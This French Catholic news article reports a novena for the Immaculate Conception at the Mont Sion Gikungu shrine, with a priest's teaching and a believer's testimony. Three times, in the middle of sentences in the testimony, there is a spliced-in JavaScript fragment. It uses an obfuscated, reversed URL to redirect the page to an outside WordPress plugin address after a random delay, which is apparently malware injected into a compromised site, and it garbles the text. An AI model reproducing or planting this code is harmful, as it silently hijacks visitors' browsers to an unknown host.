Père Félicien NIMBONA: »Dieu l’avait protégé de tout péché »

Le jeudi 29 novembre, Mont Sion Gikungu a commencé une prière de neuf jours afin de mieux se préparer à la prochaine  solennité de l’Immaculé Conception.Thème principal: »Le Puissant fit pour moi des merveilles; saint est son nom. »

Il est 18heures. La chapelle eucharistique est déjà pleine de centaines de fidèles qui viennent participer à cette neuvaine.  La fraicheur vespérale a favorisé l’animation libre avant de commencer la louange. Après, a poursuivi l’enseignement du Père Félicien NIMBONA. La parole de Dieu a été tirée dans le livre de Genèse au chapitre 3,1-15. Le Père Félicien a d’abord rappelé que nous sommes dans l’année jubilaire et que cette neuvaine va nous aider à renforcer  et faire notre la devise.

Pour commencer son instruction, il a lancé une question pertinente : « Pourquoi dit-on que Marie est l’Immaculée Conception ? »

A cela,  il est revenu sur les origines de la célébration de cette solennité : « Sa Sainteté le Pape Pie IX avait proclamé  solennellement le 8 décembre 1854 que la Vierge Marie est Immaculée Conception. Quatre ans après cette proclamation,  Marie s’était elle-même manifestée à Lourdes en France et elle s’est annoncée Immaculée Conception »

Et sur la question de savoir comment Maie peut être Immaculée alors qu’elle  était une créature comme toutes les autres, le Père Félicien a répondu : « Depuis sa conception, Marie a été protégée du  péché originel grâce au sang versé, à la mort et à la résurrection  de son Fils Jésus. Elle n’a pas été guérie mais elle a été protégée du péché. »

Tout le monde est pécheur sauf Marie la Mère de Dieu. Pourquoi ? Elle a été la première à être protégée. « Dieu avait  protégé cette Dame de tout  péché parce qu’il préparait en elle une place de son Fils. Il l’avait fait Immaculée et pleine de grâces, pour montrer comment nous serons dans la vie glorieuse.» a-t-il ajouté. Qu’elle nous prenne par la main et intercède pour nous.

Témoignages                                                                                

Dans le Sanctuaire Marial de Schoenstatt Mont Sion Gikungu, la Mère Trois fois Admirable intercède pour plusieurs gens. Et le Christ exauce par l’intercession de sa très chère Mère.

HAVYARIMANA Richard: »Dieu m’a repondu par l’intercession de Maie »

HAVYARIMANA Richard témoigne ce que le Seigneur a fait pour lui via la prière de Marie : « Par l’intercession de Marie, j’ai pu terminer mon travail de fin d’études universitaires que  j’avais raté à cause de mes fraudes. J’avais fini mes cours théoriques en 2009, mais je n’avais pas défendu mon travail  pour des raisons personnelles. Mais après, je me suis fait moi-même un faux toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}document attestant que j’ai terminé le mémoire alors que c’était faux, et je l’ai déposé quelque part. On m’a alors attrapé avec mes faux toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}documents et voilà qu’on m’a interdit désormais tout travail en rapport avec le mémoire. Je me suis reposé tout honteux. Je venais chaque fois au Sanctuaire et je pleurais devant la MTA. Je lui ai fait beaucoup  de lettres. J’ai tant attendu et le  jour est venu, elle m’a répondu. C ‘est ainsi que le 24 mai 2018, j’ai présenté solennellement mon travail de fin d’études. Je remercie Dieu parce qu’il ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne pas seulement aux innocents. Il m’a apaisé.

La prière a été clôturé par une bénédiction  finale

Brigitte IRAKOZE

Laisser un commentaire